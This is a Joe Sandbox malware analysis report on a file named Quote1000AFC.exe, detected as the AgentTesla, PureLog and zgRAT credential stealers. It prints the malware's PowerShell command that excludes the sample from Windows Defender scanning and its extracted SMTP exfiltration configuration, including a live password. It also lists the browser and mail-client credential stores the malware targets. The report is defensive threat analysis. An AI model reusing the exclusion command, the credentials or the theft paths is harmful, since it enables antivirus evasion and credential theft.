Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quote1000AFC.exe

Overview

General Information

Sample name:Quote1000AFC.exe
Analysis ID:1562879
MD5:c8ea824fa0e80350b1412b84455e65fe
SHA1:80f1484aa4e4507df7d81ec5bb9ab32976419868
SHA256:2791c4da37ccfaabed34d36c65d373650dcfa6db4cc8f2990d671e1c01cd74df
Tags:exeuser-threatcat_ch
Infos:

Detection

AgentTesla, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Quote1000AFC.exe (PID: 4032 cmdline: "C:\Users\user\Desktop\Quote1000AFC.exe" MD5: C8EA824FA0E80350B1412B84455E65FE)
    • powershell.exe (PID: 5916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote1000AFC.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6968 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • Quote1000AFC.exe (PID: 5444 cmdline: "C:\Users\user\Desktop\Quote1000AFC.exe" MD5: C8EA824FA0E80350B1412B84455E65FE)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2702375590.000000000316A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000004.00000002.2700732625.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000000.00000002.1489117798.00000000071A0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000004.00000002.2702375590.0000000003111000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000004.00000002.2702375590.0000000003111000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 7 entries
              SourceRuleDescriptionAuthorStrings
              0.2.Quote1000AFC.exe.3f52a18.2.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.Quote1000AFC.exe.3d55808.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  4.2.Quote1000AFC.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.Quote1000AFC.exe.71a0000.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      0.2.Quote1000AFC.exe.71a0000.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        Click to see the 5 entries

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote1000AFC.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote1000AFC.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote1000AFC.exe", ParentImage: C:\Users\user\Desktop\Quote1000AFC.exe, ParentProcessId: 4032, ParentProcessName: Quote1000AFC.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote1000AFC.exe", ProcessId: 5916, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote1000AFC.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote1000AFC.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote1000AFC.exe", ParentImage: C:\Users\user\Desktop\Quote1000AFC.exe, ParentProcessId: 4032, ParentProcessName: Quote1000AFC.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote1000AFC.exe", ProcessId: 5916, ProcessName: powershell.exe
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 199.79.62.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Quote1000AFC.exe, Initiated: true, ProcessId: 5444, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49708
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote1000AFC.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote1000AFC.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote1000AFC.exe", ParentImage: C:\Users\user\Desktop\Quote1000AFC.exe, ParentProcessId: 4032, ParentProcessName: Quote1000AFC.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote1000AFC.exe", ProcessId: 5916, ProcessName: powershell.exe
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-26T08:24:47.127193+010020301711A Network Trojan was detected192.168.2.849708199.79.62.115587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-26T08:24:59.900079+010028555421A Network Trojan was detected192.168.2.849708199.79.62.115587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-26T08:24:59.900079+010028552451A Network Trojan was detected192.168.2.849708199.79.62.115587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-26T08:24:47.127193+010028397231Malware Command and Control Activity Detected192.168.2.849708199.79.62.115587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-26T08:24:47.127193+010028400321A Network Trojan was detected192.168.2.849708199.79.62.115587TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}
                        Source: Quote1000AFC.exeReversingLabs: Detection: 31%
                        Source: Quote1000AFC.exeVirustotal: Detection: 43%Perma Link
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: Quote1000AFC.exeJoe Sandbox ML: detected
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: /log.tmp
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <br>[
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ]<br>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <br>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Time:
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <br>User Name:
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <br>Computer Name:
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <br>OSFullName:
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <br>CPU:
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <br>RAM:
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <br>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: IP Address:
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <br>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <hr>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: New
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: IP Address:
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: false
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: false
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: false
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: false
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: false
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: false
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: false
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: false
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: false
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: mail.mbarieservicesltd.com
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: saless@mbarieservicesltd.com
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: *o9H+18Q4%;M
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: iinfo@mbarieservicesltd.com
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: false
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: false
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: appdata
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: KTvkzEc
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: KTvkzEc.exe
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: KTvkzEc
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Type
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <br>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <hr>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <br>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <b>[
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ]</b> (
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: )<br>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {BACK}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {ALT+TAB}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {ALT+F4}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {TAB}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {ESC}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {Win}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {CAPSLOCK}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {KEYUP}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {KEYDOWN}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {KEYLEFT}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {KEYRIGHT}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {DEL}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {END}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {HOME}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {Insert}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {NumLock}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {PageDown}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {PageUp}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {ENTER}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {F1}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {F2}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {F3}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {F4}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {F5}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {F6}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {F7}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {F8}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {F9}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {F10}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {F11}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {F12}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: control
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {CTRL}
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: &amp;
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: &lt;
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: &gt;
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: &quot;
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <br><hr>Copied Text: <br>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <hr>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: logins
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: IE/Edge
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Windows Secure Note
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Windows Web Password Credential
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Windows Credential Picker Protector
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Web Credentials
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Windows Credentials
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Windows Domain Certificate Credential
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Windows Domain Password Credential
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Windows Extended Credential
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SchemaId
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: pResourceElement
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: pIdentityElement
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: pPackageSid
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: pAuthenticatorElement
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: IE/Edge
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: UC Browser
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: UCBrowser\
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Login Data
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: journal
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: wow_logins
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Safari for Windows
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <array>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <dict>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <string>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: </string>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <string>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: </string>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: <data>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: </data>
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: -convert xml1 -s -o "
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \fixed_keychain.xml"
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Microsoft\Protect\
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: credential
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: QQ Browser
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Tencent\QQBrowser\User Data
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Default\EncryptedStorage
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Profile
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \EncryptedStorage
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: entries
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: category
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: str3
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: str2
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: blob0
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: password_value
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: IncrediMail
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: PopPassword
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SmtpPassword
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Software\IncrediMail\Identities\
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Accounts_New
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: PopPassword
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SmtpPassword
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SmtpServer
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: EmailAddress
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Eudora
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: current
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Settings
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: SavePasswordText
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Settings
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ReturnAddress
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Falkon Browser
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \falkon\profiles\
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: profiles.ini
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: profiles.ini
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \browsedata.db
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: autofill
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ClawsMail
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Claws-mail
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \clawsrc
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \clawsrc
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: passkey0
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: master_passphrase_salt=(.+)
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \accountrc
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: smtp_server
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: address
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: account
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \passwordstorerc
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: {(.*),(.*)}(.*)
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Flock Browser
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: APPDATA
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: \Flock\Browser\
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: signons3.txt
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: DynDns
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Dyn\Updater\config.dyndns
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: username=
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: password=
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: https://account.dyn.com/
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: t6KzXhCh
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Dyn\Updater\daemon.cfg
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: global
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: accounts
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: account.
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: username
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: account.
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: password
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.unpackString decryptor: Psi/Psi+
